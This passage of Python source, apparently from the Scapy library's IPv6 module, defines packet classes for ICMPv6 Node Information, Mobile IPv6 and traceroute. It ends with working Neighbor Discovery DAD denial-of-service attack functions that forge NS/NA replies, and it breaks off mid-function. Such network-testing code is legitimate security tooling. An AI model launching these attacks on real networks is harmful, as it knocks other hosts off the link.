s = s[20:]
return s, (3, res)
elif qtype == 4: # IPv4 addresses with TTLs
# XXX TODO : get the real length
res = []
while len(s) >= 8: # 4 + 4
ttl = struct.unpack("!I", s[:4])[0]
ip = inet_ntop(socket.AF_INET, s[4:8])
res.append((ttl, ip))
s = s[8:]
return s, (4, res)
else:
# XXX TODO : implement me and deal with real length
return "", (0, s)
def i2repr(self, pkt, x):
if x is None:
return "[]"
if type(x) is tuple and len(x) == 2:
t, val = x
if t == 2: # DNS names
ttl,l = val
l = dnsrepr2names(l)
return "ttl:%d %s" % (ttl, ", ".join(l))
elif t == 3 or t == 4:
return "[ %s ]" % (", ".join(map(lambda (x,y): "(%d, %s)" % (x, y), val)))
return repr(val)
return repr(x) # XXX should not happen
# By default, sent responses have code set to 0 (successful)
class ICMPv6NIReplyNOOP(_ICMPv6NIAnswers, _ICMPv6NIHashret, _ICMPv6):
name = "ICMPv6 Node Information Reply - NOOP Reply"
fields_desc = [ ByteEnumField("type", 140, icmp6types),
ByteEnumField("code", 0, _nireply_code),
XShortField("cksum", None),
ShortEnumField("qtype", 0, icmp6_niqtypes),
BitField("unused", 0, 10),
FlagsField("flags", 0, 6, "TACLSG"),
NonceField("nonce", None),
NIReplyDataField("data", None)]
class ICMPv6NIReplyName(ICMPv6NIReplyNOOP):
name = "ICMPv6 Node Information Reply - Node Names"
qtype = 2
class ICMPv6NIReplyIPv6(ICMPv6NIReplyNOOP):
name = "ICMPv6 Node Information Reply - IPv6 addresses"
qtype = 3
class ICMPv6NIReplyIPv4(ICMPv6NIReplyNOOP):
name = "ICMPv6 Node Information Reply - IPv4 addresses"
qtype = 4
class ICMPv6NIReplyRefuse(ICMPv6NIReplyNOOP):
name = "ICMPv6 Node Information Reply - Responder refuses to supply answer"
code = 1
class ICMPv6NIReplyUnknown(ICMPv6NIReplyNOOP):
name = "ICMPv6 Node Information Reply - Qtype unknown to the responder"
code = 2
def _niquery_guesser(p):
cls = conf.raw_layer
type = ord(p[0])
if type == 139: # Node Info Query specific stuff
if len(p) > 6:
qtype, = struct.unpack("!H", p[4:6])
cls = { 0: ICMPv6NIQueryNOOP,
2: ICMPv6NIQueryName,
3: ICMPv6NIQueryIPv6,
4: ICMPv6NIQueryIPv4 }.get(qtype, conf.raw_layer)
elif type == 140: # Node Info Reply specific stuff
code = ord(p[1])
if code == 0:
if len(p) > 6:
qtype, = struct.unpack("!H", p[4:6])
cls = { 2: ICMPv6NIReplyName,
3: ICMPv6NIReplyIPv6,
4: ICMPv6NIReplyIPv4 }.get(qtype, ICMPv6NIReplyNOOP)
elif code == 1:
cls = ICMPv6NIReplyRefuse
elif code == 2:
cls = ICMPv6NIReplyUnknown
return cls
#############################################################################
#############################################################################
### Mobile IPv6 (RFC 3775) and Nemo (RFC 3963) ###
#############################################################################
#############################################################################
# Mobile IPv6 ICMPv6 related classes
class ICMPv6HAADRequest(_ICMPv6):
name = 'ICMPv6 Home Agent Address Discovery Request'
fields_desc = [ ByteEnumField("type", 144, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
XShortField("id", None),
BitEnumField("R", 1, 1, {1: 'MR'}),
XBitField("res", 0, 15) ]
def hashret(self):
return struct.pack("!H",self.id)+self.payload.hashret()
class ICMPv6HAADReply(_ICMPv6):
name = 'ICMPv6 Home Agent Address Discovery Reply'
fields_desc = [ ByteEnumField("type", 145, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
XShortField("id", None),
BitEnumField("R", 1, 1, {1: 'MR'}),
XBitField("res", 0, 15),
IP6ListField('addresses', None) ]
def hashret(self):
return struct.pack("!H",self.id)+self.payload.hashret()
def answers(self, other):
if not isinstance(other, ICMPv6HAADRequest):
return 0
return self.id == other.id
class ICMPv6MPSol(_ICMPv6):
name = 'ICMPv6 Mobile Prefix Solicitation'
fields_desc = [ ByteEnumField("type", 146, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
XShortField("id", None),
XShortField("res", 0) ]
def _hashret(self):
return struct.pack("!H",self.id)
class ICMPv6MPAdv(_ICMPv6NDGuessPayload, _ICMPv6):
name = 'ICMPv6 Mobile Prefix Advertisement'
fields_desc = [ ByteEnumField("type", 147, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
XShortField("id", None),
BitEnumField("flags", 2, 2, {2: 'M', 1:'O'}),
XBitField("res", 0, 14) ]
def hashret(self):
return struct.pack("!H",self.id)
def answers(self, other):
return isinstance(other, ICMPv6MPSol)
# Mobile IPv6 Options classes
_mobopttypes = { 2: "Binding Refresh Advice",
3: "Alternate Care-of Address",
4: "Nonce Indices",
5: "Binding Authorization Data",
6: "Mobile Network Prefix (RFC3963)",
7: "Link-Layer Address (RFC4068)",
8: "Mobile Node Identifier (RFC4283)",
9: "Mobility Message Authentication (RFC4285)",
10: "Replay Protection (RFC4285)",
11: "CGA Parameters Request (RFC4866)",
12: "CGA Parameters (RFC4866)",
13: "Signature (RFC4866)",
14: "Home Keygen Token (RFC4866)",
15: "Care-of Test Init (RFC4866)",
16: "Care-of Test (RFC4866)" }
class _MIP6OptAlign:
""" Mobile IPv6 options have alignment requirements of the form x*n+y.
This class is inherited by all MIPv6 options to help in computing the
required Padding for that option, i.e. the need for a Pad1 or PadN
option before it. They only need to provide x and y as class
parameters. (x=0 and y=0 are used when no alignment is required)"""
def alignment_delta(self, curpos):
x = self.x ; y = self.y
if x == 0 and y ==0:
return 0
delta = x*((curpos - y + x - 1)/x) + y - curpos
return delta
class MIP6OptBRAdvice(_MIP6OptAlign, Packet):
name = 'Mobile IPv6 Option - Binding Refresh Advice'
fields_desc = [ ByteEnumField('otype', 2, _mobopttypes),
ByteField('olen', 2),
ShortField('rinter', 0) ]
x = 2 ; y = 0# alignment requirement: 2n
class MIP6OptAltCoA(_MIP6OptAlign, Packet):
name = 'MIPv6 Option - Alternate Care-of Address'
fields_desc = [ ByteEnumField('otype', 3, _mobopttypes),
ByteField('olen', 16),
IP6Field("acoa", "::") ]
x = 8 ; y = 6 # alignment requirement: 8n+6
class MIP6OptNonceIndices(_MIP6OptAlign, Packet):
name = 'MIPv6 Option - Nonce Indices'
fields_desc = [ ByteEnumField('otype', 4, _mobopttypes),
ByteField('olen', 16),
ShortField('hni', 0),
ShortField('coni', 0) ]
x = 2 ; y = 0 # alignment requirement: 2n
class MIP6OptBindingAuthData(_MIP6OptAlign, Packet):
name = 'MIPv6 Option - Binding Authorization Data'
fields_desc = [ ByteEnumField('otype', 5, _mobopttypes),
ByteField('olen', 16),
BitField('authenticator', 0, 96) ]
x = 8 ; y = 2 # alignment requirement: 8n+2
class MIP6OptMobNetPrefix(_MIP6OptAlign, Packet): # NEMO - RFC 3963
name = 'NEMO Option - Mobile Network Prefix'
fields_desc = [ ByteEnumField("otype", 6, _mobopttypes),
ByteField("olen", 18),
ByteField("reserved", 0),
ByteField("plen", 64),
IP6Field("prefix", "::") ]
x = 8 ; y = 4 # alignment requirement: 8n+4
class MIP6OptLLAddr(_MIP6OptAlign, Packet): # Sect 6.4.4 of RFC 4068
name = "MIPv6 Option - Link-Layer Address (MH-LLA)"
fields_desc = [ ByteEnumField("otype", 7, _mobopttypes),
ByteField("olen", 7),
ByteEnumField("ocode", 2, _rfc4068_lla_optcode),
ByteField("pad", 0),
MACField("lla", ETHER_ANY) ] # Only support ethernet
x = 0 ; y = 0 # alignment requirement: none
class MIP6OptMNID(_MIP6OptAlign, Packet): # RFC 4283
name = "MIPv6 Option - Mobile Node Identifier"
fields_desc = [ ByteEnumField("otype", 8, _mobopttypes),
FieldLenField("olen", None, length_of="id", fmt="B",
adjust = lambda pkt,x: x+1),
ByteEnumField("subtype", 1, {1: "NAI"}),
StrLenField("id", "",
length_from = lambda pkt: pkt.olen-1) ]
x = 0 ; y = 0 # alignment requirement: none
# We only support decoding and basic build. Automatic HMAC computation is
# too much work for our current needs. It is left to the user (I mean ...
# you). --arno
class MIP6OptMsgAuth(_MIP6OptAlign, Packet): # RFC 4285 (Sect. 5)
name = "MIPv6 Option - Mobility Message Authentication"
fields_desc = [ ByteEnumField("otype", 9, _mobopttypes),
FieldLenField("olen", None, length_of="authdata", fmt="B",
adjust = lambda pkt,x: x+5),
ByteEnumField("subtype", 1, {1: "MN-HA authentication mobility option",
2: "MN-AAA authentication mobility option"}),
IntField("mspi", None),
StrLenField("authdata", "A"*12,
length_from = lambda pkt: pkt.olen-5) ]
x = 4 ; y = 1 # alignment requirement: 4n+1
# Extracted from RFC 1305 (NTP) :
# NTP timestamps are represented as a 64-bit unsigned fixed-point number,
# in seconds relative to 0h on 1 January 1900. The integer part is in the
# first 32 bits and the fraction part in the last 32 bits.
class NTPTimestampField(LongField):
epoch = (1900, 1, 1, 0, 0, 0, 5, 1, 0)
def i2repr(self, pkt, x):
if x < ((50*31536000)<<32):
return "Some date a few decades ago (%d)" % x
# delta from epoch (= (1900, 1, 1, 0, 0, 0, 5, 1, 0)) to
# January 1st 1970 :
delta = -2209075761
i = int(x >> 32)
j = float(x & 0xffffffff) * 2.0**-32
res = i + j + delta
from time import strftime
t = time.strftime("%a, %d %b %Y %H:%M:%S +0000", time.gmtime(res))
return "%s (%d)" % (t, x)
class MIP6OptReplayProtection(_MIP6OptAlign, Packet): # RFC 4285 (Sect. 6)
name = "MIPv6 option - Replay Protection"
fields_desc = [ ByteEnumField("otype", 10, _mobopttypes),
ByteField("olen", 8),
NTPTimestampField("timestamp", 0) ]
x = 8 ; y = 2 # alignment requirement: 8n+2
class MIP6OptCGAParamsReq(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.6)
name = "MIPv6 option - CGA Parameters Request"
fields_desc = [ ByteEnumField("otype", 11, _mobopttypes),
ByteField("olen", 0) ]
x = 0 ; y = 0 # alignment requirement: none
# XXX TODO: deal with CGA param fragmentation and build of defragmented
# XXX version. Passing of a big CGAParam structure should be
# XXX simplified. Make it hold packets, by the way --arno
class MIP6OptCGAParams(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.1)
name = "MIPv6 option - CGA Parameters"
fields_desc = [ ByteEnumField("otype", 12, _mobopttypes),
FieldLenField("olen", None, length_of="cgaparams", fmt="B"),
StrLenField("cgaparams", "",
length_from = lambda pkt: pkt.olen) ]
x = 0 ; y = 0 # alignment requirement: none
class MIP6OptSignature(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.2)
name = "MIPv6 option - Signature"
fields_desc = [ ByteEnumField("otype", 13, _mobopttypes),
FieldLenField("olen", None, length_of="sig", fmt="B"),
StrLenField("sig", "",
length_from = lambda pkt: pkt.olen) ]
x = 0 ; y = 0 # alignment requirement: none
class MIP6OptHomeKeygenToken(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.3)
name = "MIPv6 option - Home Keygen Token"
fields_desc = [ ByteEnumField("otype", 14, _mobopttypes),
FieldLenField("olen", None, length_of="hkt", fmt="B"),
StrLenField("hkt", "",
length_from = lambda pkt: pkt.olen) ]
x = 0 ; y = 0 # alignment requirement: none
class MIP6OptCareOfTestInit(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.4)
name = "MIPv6 option - Care-of Test Init"
fields_desc = [ ByteEnumField("otype", 15, _mobopttypes),
ByteField("olen", 0) ]
x = 0 ; y = 0 # alignment requirement: none
class MIP6OptCareOfTest(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.5)
name = "MIPv6 option - Care-of Test"
fields_desc = [ ByteEnumField("otype", 16, _mobopttypes),
FieldLenField("olen", None, length_of="cokt", fmt="B"),
StrLenField("cokt", '\x00'*8,
length_from = lambda pkt: pkt.olen) ]
x = 0 ; y = 0 # alignment requirement: none
class MIP6OptUnknown(_MIP6OptAlign, Packet):
name = 'Scapy6 - Unknown Mobility Option'
fields_desc = [ ByteEnumField("otype", 6, _mobopttypes),
FieldLenField("olen", None, length_of="odata", fmt="B"),
StrLenField("odata", "",
length_from = lambda pkt: pkt.olen) ]
x = 0 ; y = 0 # alignment requirement: none
moboptcls = { 0: Pad1,
1: PadN,
2: MIP6OptBRAdvice,
3: MIP6OptAltCoA,
4: MIP6OptNonceIndices,
5: MIP6OptBindingAuthData,
6: MIP6OptMobNetPrefix,
7: MIP6OptLLAddr,
8: MIP6OptMNID,
9: MIP6OptMsgAuth,
10: MIP6OptReplayProtection,
11: MIP6OptCGAParamsReq,
12: MIP6OptCGAParams,
13: MIP6OptSignature,
14: MIP6OptHomeKeygenToken,
15: MIP6OptCareOfTestInit,
16: MIP6OptCareOfTest }
# Main Mobile IPv6 Classes
mhtypes = { 0: 'BRR',
1: 'HoTI',
2: 'CoTI',
3: 'HoT',
4: 'CoT',
5: 'BU',
6: 'BA',
7: 'BE',
8: 'Fast BU',
9: 'Fast BA',
10: 'Fast NA' }
# From http://www.iana.org/assignments/mobility-parameters
bastatus = { 0: 'Binding Update accepted',
1: 'Accepted but prefix discovery necessary',
128: 'Reason unspecified',
129: 'Administratively prohibited',
130: 'Insufficient resources',
131: 'Home registration not supported',
132: 'Not home subnet',
133: 'Not home agent for this mobile node',
134: 'Duplicate Address Detection failed',
135: 'Sequence number out of window',
136: 'Expired home nonce index',
137: 'Expired care-of nonce index',
138: 'Expired nonces',
139: 'Registration type change disallowed',
140: 'Mobile Router Operation not permitted',
141: 'Invalid Prefix',
142: 'Not Authorized for Prefix',
143: 'Forwarding Setup failed (prefixes missing)',
144: 'MIPV6-ID-MISMATCH',
145: 'MIPV6-MESG-ID-REQD',
146: 'MIPV6-AUTH-FAIL',
147: 'Permanent home keygen token unavailable',
148: 'CGA and signature verification failed',
149: 'Permanent home keygen token exists',
150: 'Non-null home nonce index expected' }
class _MobilityHeader(Packet):
name = 'Dummy IPv6 Mobility Header'
overload_fields = { IPv6: { "nh": 135 }}
def post_build(self, p, pay):
p += pay
l = self.len
if self.len is None:
l = (len(p)-8)/8
p = p[0] + struct.pack("B", l) + p[2:]
if self.cksum is None:
cksum = in6_chksum(135, self.underlayer, p)
else:
cksum = self.cksum
p = p[:4]+struct.pack("!H", cksum)+p[6:]
return p
class MIP6MH_Generic(_MobilityHeader): # Mainly for decoding of unknown msg
name = "IPv6 Mobility Header - Generic Message"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None),
ByteEnumField("mhtype", None, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
StrLenField("msg", "\x00"*2,
length_from = lambda pkt: 8*pkt.len-6) ]
# TODO: make a generic _OptionsField
class _MobilityOptionsField(PacketListField):
__slots__ = ["curpos"]
def __init__(self, name, default, cls, curpos, count_from=None, length_from=None):
self.curpos = curpos
PacketListField.__init__(self, name, default, cls, count_from=count_from, length_from=length_from)
def getfield(self, pkt, s):
l = self.length_from(pkt)
return s[l:],self.m2i(pkt, s[:l])
def i2len(self, pkt, i):
return len(self.i2m(pkt, i))
def m2i(self, pkt, x):
opt = []
while x:
o = ord(x[0]) # Option type
cls = self.cls
if moboptcls.has_key(o):
cls = moboptcls[o]
try:
op = cls(x)
except:
op = self.cls(x)
opt.append(op)
if isinstance(op.payload, conf.raw_layer):
x = op.payload.load
del(op.payload)
else:
x = ""
return opt
def i2m(self, pkt, x):
autopad = None
try:
autopad = getattr(pkt, "autopad") # Hack : 'autopad' phantom field
except:
autopad = 1
if not autopad:
return "".join(map(str, x))
curpos = self.curpos
s = ""
for p in x:
d = p.alignment_delta(curpos)
curpos += d
if d == 1:
s += str(Pad1())
elif d != 0:
s += str(PadN(optdata='\x00'*(d-2)))
pstr = str(p)
curpos += len(pstr)
s += pstr
# Let's make the class including our option field
# a multiple of 8 octets long
d = curpos % 8
if d == 0:
return s
d = 8 - d
if d == 1:
s += str(Pad1())
elif d != 0:
s += str(PadN(optdata='\x00'*(d-2)))
return s
def addfield(self, pkt, s, val):
return s+self.i2m(pkt, val)
class MIP6MH_BRR(_MobilityHeader):
name = "IPv6 Mobility Header - Binding Refresh Request"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None),
ByteEnumField("mhtype", 0, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
ShortField("res2", None),
_PhantomAutoPadField("autopad", 1), # autopad activated by default
_MobilityOptionsField("options", [], MIP6OptUnknown, 8,
length_from = lambda pkt: 8*pkt.len) ]
overload_fields = { IPv6: { "nh": 135 } }
def hashret(self):
# Hack: BRR, BU and BA have the same hashret that returns the same
# value "\x00\x08\x09" (concatenation of mhtypes). This is
# because we need match BA with BU and BU with BRR. --arno
return "\x00\x08\x09"
class MIP6MH_HoTI(_MobilityHeader):
name = "IPv6 Mobility Header - Home Test Init"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None),
ByteEnumField("mhtype", 1, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
StrFixedLenField("reserved", "\x00"*2, 2),
StrFixedLenField("cookie", "\x00"*8, 8),
_PhantomAutoPadField("autopad", 1), # autopad activated by default
_MobilityOptionsField("options", [], MIP6OptUnknown, 16,
length_from = lambda pkt: 8*(pkt.len-1)) ]
overload_fields = { IPv6: { "nh": 135 } }
def hashret(self):
return self.cookie
class MIP6MH_CoTI(MIP6MH_HoTI):
name = "IPv6 Mobility Header - Care-of Test Init"
mhtype = 2
def hashret(self):
return self.cookie
class MIP6MH_HoT(_MobilityHeader):
name = "IPv6 Mobility Header - Home Test"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None),
ByteEnumField("mhtype", 3, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
ShortField("index", None),
StrFixedLenField("cookie", "\x00"*8, 8),
StrFixedLenField("token", "\x00"*8, 8),
_PhantomAutoPadField("autopad", 1), # autopad activated by default
_MobilityOptionsField("options", [], MIP6OptUnknown, 24,
length_from = lambda pkt: 8*(pkt.len-2)) ]
overload_fields = { IPv6: { "nh": 135 } }
def hashret(self):
return self.cookie
def answers(self):
if (isinstance(other, MIP6MH_HoTI) and
self.cookie == other.cookie):
return 1
return 0
class MIP6MH_CoT(MIP6MH_HoT):
name = "IPv6 Mobility Header - Care-of Test"
mhtype = 4
def hashret(self):
return self.cookie
def answers(self):
if (isinstance(other, MIP6MH_CoTI) and
self.cookie == other.cookie):
return 1
return 0
class LifetimeField(ShortField):
def i2repr(self, pkt, x):
return "%d sec" % (4*x)
class MIP6MH_BU(_MobilityHeader):
name = "IPv6 Mobility Header - Binding Update"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes)
ByteEnumField("mhtype", 5, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
XShortField("seq", None), # TODO: ShortNonceField
FlagsField("flags", "KHA", 7, "PRMKLHA"),
XBitField("reserved", 0, 9),
LifetimeField("mhtime", 3), # unit == 4 seconds
_PhantomAutoPadField("autopad", 1), # autopad activated by default
_MobilityOptionsField("options", [], MIP6OptUnknown, 12,
length_from = lambda pkt: 8*pkt.len - 4) ]
overload_fields = { IPv6: { "nh": 135 } }
def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret()
return "\x00\x08\x09"
def answers(self, other):
if isinstance(other, MIP6MH_BRR):
return 1
return 0
class MIP6MH_BA(_MobilityHeader):
name = "IPv6 Mobility Header - Binding ACK"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes)
ByteEnumField("mhtype", 6, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
ByteEnumField("status", 0, bastatus),
FlagsField("flags", "K", 3, "PRK"),
XBitField("res2", None, 5),
XShortField("seq", None), # TODO: ShortNonceField
XShortField("mhtime", 0), # unit == 4 seconds
_PhantomAutoPadField("autopad", 1), # autopad activated by default
_MobilityOptionsField("options", [], MIP6OptUnknown, 12,
length_from = lambda pkt: 8*pkt.len-4) ]
overload_fields = { IPv6: { "nh": 135 }}
def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret()
return "\x00\x08\x09"
def answers(self, other):
if (isinstance(other, MIP6MH_BU) and
other.mhtype == 5 and
self.mhtype == 6 and
other.flags & 0x1 and # Ack request flags is set
self.seq == other.seq):
return 1
return 0
_bestatus = { 1: 'Unknown binding for Home Address destination option',
2: 'Unrecognized MH Type value' }
# TODO: match Binding Error to its stimulus
class MIP6MH_BE(_MobilityHeader):
name = "IPv6 Mobility Header - Binding Error"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes)
ByteEnumField("mhtype", 7, mhtypes),
ByteField("res", 0),
XShortField("cksum", None),
ByteEnumField("status", 0, _bestatus),
ByteField("reserved", 0),
IP6Field("ha", "::"),
_MobilityOptionsField("options", [], MIP6OptUnknown, 24,
length_from = lambda pkt: 8*(pkt.len-2)) ]
overload_fields = { IPv6: { "nh": 135 }}
_mip6_mhtype2cls = { 0: MIP6MH_BRR,
1: MIP6MH_HoTI,
2: MIP6MH_CoTI,
3: MIP6MH_HoT,
4: MIP6MH_CoT,
5: MIP6MH_BU,
6: MIP6MH_BA,
7: MIP6MH_BE }
#############################################################################
#############################################################################
### Traceroute6 ###
#############################################################################
#############################################################################
class AS_resolver6(AS_resolver_riswhois):
def _resolve_one(self, ip):
"""
overloaded version to provide a Whois resolution on the
embedded IPv4 address if the address is 6to4 or Teredo.
Otherwise, the native IPv6 address is passed.
"""
if in6_isaddr6to4(ip): # for 6to4, use embedded @
tmp = inet_pton(socket.AF_INET6, ip)
addr = inet_ntop(socket.AF_INET, tmp[2:6])
elif in6_isaddrTeredo(ip): # for Teredo, use mapped address
addr = teredoAddrExtractInfo(ip)[2]
else:
addr = ip
_, asn, desc = AS_resolver_riswhois._resolve_one(self, addr)
return ip,asn,desc
class TracerouteResult6(TracerouteResult):
__slots__ = []
def show(self):
return self.make_table(lambda (s,r): (s.sprintf("%-42s,IPv6.dst%:{TCP:tcp%TCP.dport%}{UDP:udp%UDP.dport%}{ICMPv6EchoRequest:IER}"), # TODO: ICMPv6 !
s.hlim,
r.sprintf("%-42s,IPv6.src% {TCP:%TCP.flags%}"+
"{ICMPv6DestUnreach:%ir,type%}{ICMPv6PacketTooBig:%ir,type%}"+
"{ICMPv6TimeExceeded:%ir,type%}{ICMPv6ParamProblem:%ir,type%}"+
"{ICMPv6EchoReply:%ir,type%}")))
def get_trace(self):
trace = {}
for s,r in self.res:
if IPv6 not in s:
continue
d = s[IPv6].dst
if d not in trace:
trace[d] = {}
t = not (ICMPv6TimeExceeded in r or
ICMPv6DestUnreach in r or
ICMPv6PacketTooBig in r or
ICMPv6ParamProblem in r)
trace[d][s[IPv6].hlim] = r[IPv6].src, t
for k in trace.itervalues():
try:
m = min(x for x, y in k.itervalues() if y)
except ValueError:
continue
for l in k.keys(): # use .keys(): k is modified in the loop
if l > m:
del k[l]
return trace
def graph(self, ASres=AS_resolver6(), **kargs):
TracerouteResult.graph(self, ASres=ASres, **kargs)
def traceroute6(target, dport=80, minttl=1, maxttl=30, sport=RandShort(),
l4 = None, timeout=2, verbose=None, **kargs):
"""
Instant TCP traceroute using IPv6 :
traceroute6(target, [maxttl=30], [dport=80], [sport=80]) -> None
"""
if verbose is None:
verbose = conf.verb
if l4 is None:
a,b = sr(IPv6(dst=target, hlim=(minttl,maxttl))/TCP(seq=RandInt(),sport=sport, dport=dport),
timeout=timeout, filter="icmp6 or tcp", verbose=verbose, **kargs)
else:
a,b = sr(IPv6(dst=target, hlim=(minttl,maxttl))/l4,
timeout=timeout, verbose=verbose, **kargs)
a = TracerouteResult6(a.res)
if verbose:
a.display()
return a,b
#############################################################################
#############################################################################
### Sockets ###
#############################################################################
#############################################################################
class L3RawSocket6(L3RawSocket):
def __init__(self, type = ETH_P_IPV6, filter=None, iface=None, promisc=None, nofilter=0):
L3RawSocket.__init__(self, type, filter, iface, promisc)
# NOTE: if fragmentation is needed, it will be done by the kernel (RFC 2292)
self.outs = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW)
self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type))
def IPv6inIP(dst='203.178.135.36', src=None):
_IPv6inIP.dst = dst
_IPv6inIP.src = src
if not conf.L3socket == _IPv6inIP:
_IPv6inIP.cls = conf.L3socket
else:
del(conf.L3socket)
return _IPv6inIP
class _IPv6inIP(SuperSocket):
dst = '127.0.0.1'
src = None
cls = None
def __init__(self, family=socket.AF_INET6, type=socket.SOCK_STREAM, proto=0, **args):
SuperSocket.__init__(self, family, type, proto)
self.worker = self.cls(**args)
def set(self, dst, src=None):
_IPv6inIP.src = src
_IPv6inIP.dst = dst
def nonblock_recv(self):
p = self.worker.nonblock_recv()
return self._recv(p)
def recv(self, x):
p = self.worker.recv(x)
return self._recv(p, x)
def _recv(self, p, x=MTU):
if p is None:
return p
elif isinstance(p, IP):
# TODO: verify checksum
if p.src == self.dst and p.proto == socket.IPPROTO_IPV6:
if isinstance(p.payload, IPv6):
return p.payload
return p
def send(self, x):
return self.worker.send(IP(dst=self.dst, src=self.src, proto=socket.IPPROTO_IPV6)/x)
#############################################################################
#############################################################################
### Neighbor Discovery Protocol Attacks ###
#############################################################################
#############################################################################
def _NDP_Attack_DAD_DoS(reply_callback, iface=None, mac_src_filter=None,
tgt_filter=None, reply_mac=None):
"""
Internal generic helper accepting a specific callback as first argument,
for NS or NA reply. See the two specific functions below.
"""
def is_request(req, mac_src_filter, tgt_filter):
"""
Check if packet req is a request
"""
# Those simple checks are based on Section 5.4.2 of RFC 4862
if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req):
return 0
# Get and compare the MAC address
mac_src = req[Ether].src
if mac_src_filter and mac_src != mac_src_filter:
return 0
# Source must be the unspecified address
if req[IPv6].src != "::":
return 0
# Check destination is the link-local solicited-node multicast
# address associated with target address in received NS
tgt = socket.inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt)
if tgt_filter and tgt != tgt_filter:
return 0
received_snma = socket.inet_pton(socket.AF_INET6, req[IPv6].dst)
expected_snma = in6_getnsma(tgt)
if received_snma != expected_snma:
return 0
return 1
if not iface:
iface = conf.iface
# To prevent sniffing our own traffic
if not reply_mac:
reply_mac = get_if_hwaddr(iface)
sniff_filter = "icmp6 and not ether src %s" % reply_mac
sniff(store=0,
filter=sniff_filter,
lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter),
prn=lambda x: reply_callback(x, reply_mac, iface),
iface=iface)
def NDP_Attack_DAD_DoS_via_NS(iface=None, mac_src_filter=None, tgt_filter=None,
reply_mac=None):
"""
Perform the DAD DoS attack using NS described in section 4.1.3 of RFC
3756. This is done by listening incoming NS messages sent from the
unspecified address and sending a NS reply for the target address,
leading the peer to believe that another node is also performing DAD
for that address.
By default, the fake NS sent to create the DoS uses:
- as target address the target address found in received NS.
- as IPv6 source address: the unspecified address (::).
- as IPv6 destination address: the link-local solicited-node multicast
address derived from the target address in received NS.
- the mac address of the interface as source (or reply_mac, see below).
- the multicast mac address derived from the solicited node multicast
address used as IPv6 destination address.
Following arguments can be used to change the behavior:
iface: a specific interface (e.g. "eth0") of the system on which the
DoS should be launched. If None is provided conf.iface is used.
mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
Only NS messages received from this source will trigger replies.
This allows limiting the effects of the DoS to a single target by
filtering on its mac address. The default value is None: the DoS
is not limited to a specific mac address.
tgt_filter: Same as previous but for a specific target IPv6 address for
received NS. If the target address in the NS message (not the IPv6
destination address) matches that address, then a fake reply will
be sent, i.e. the emitter will be a target of the DoS.
reply_mac: allow specifying a specific source mac address for the reply,
i.e. to prevent the use of the mac address of the interface.
"""
def ns_reply_callback(req, reply_mac, iface):
"""
Callback that reply to a NS by sending a similar NS
"""
# Let's build a reply and send it
mac = req[Ether].src
dst = req[IPv6].dst
tgt = req[ICMPv6ND_NS].tgt
rep = Ether(src=reply_mac)/IPv6(src="::", dst=dst)/ICMPv6ND_NS(tgt=tgt)
sendp(rep, iface=iface, verbose=0)
print "Reply NS for target address %s (received from %s)" % (tgt, mac)
_NDP_Attack_DAD_DoS(ns_reply_callback, iface, mac_src_filter,
tgt_filter, reply_mac)
def NDP_Attack_DAD_DoS_via_NA(iface=None, mac_src_filter=None, tgt_filter=None,
reply_mac=None):
"""
Perform the DAD DoS attack using NS described in section 4.1.3 of RFC
3756. This is done by listening incoming NS messages *sent from the
unspecified address* and sending a NA reply for the target address,
leading the peer to believe that another node is also performing DAD
for that address.
By default, the fake NA sent to create the DoS uses:
- as target address the target address found in received NS.
- as IPv6 source address: the target address found in received NS.
- as IPv6 destination address: the link-local solicited-node multicast
address derived from the target address in received NS.
- the mac address of the interface as source (or reply_mac, see below).
- the multicast mac address derived from the solicited node multicast
address used as IPv6 destination address.
- A Target Link-Layer address option (ICMPv6NDOptDstLLAddr) filled
with the mac address used as source of the NA.
Following arguments can be used to change the behavior:
iface: a specific interface (e.g. "eth0") of the system on which the
DoS should be launched. If None is provided conf.iface is used.
mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
Only NS messages received from this source will trigger replies.
This allows limiting the effects of the DoS to a single target by
filtering on its mac address. The default value is None: the DoS
is not limited to a specific mac address.
tgt_filter: Same as previous but for a specific target IPv6 address for
received NS. If the target address in the NS message (not the IPv6
destination address) matches that address, then a fake reply will
be sent, i.e. the emitter will be a target of the DoS.
reply_mac: allow specifying a specific source mac address for the reply,
i.e. to prevent the use of the mac address of the interface. This
address will also be used in the Target Link-Layer Address option.
"""
def na_reply_callback(req, reply_mac, iface):
"""
Callback that reply to a NS with a NA
"""
# Let's build a reply and send it
mac = req[Ether].src
dst = req[IPv6].dst
tgt = req[ICMPv6ND_NS].tgt
rep = Ether(src=reply_mac)/IPv6(src=tgt, dst=dst)
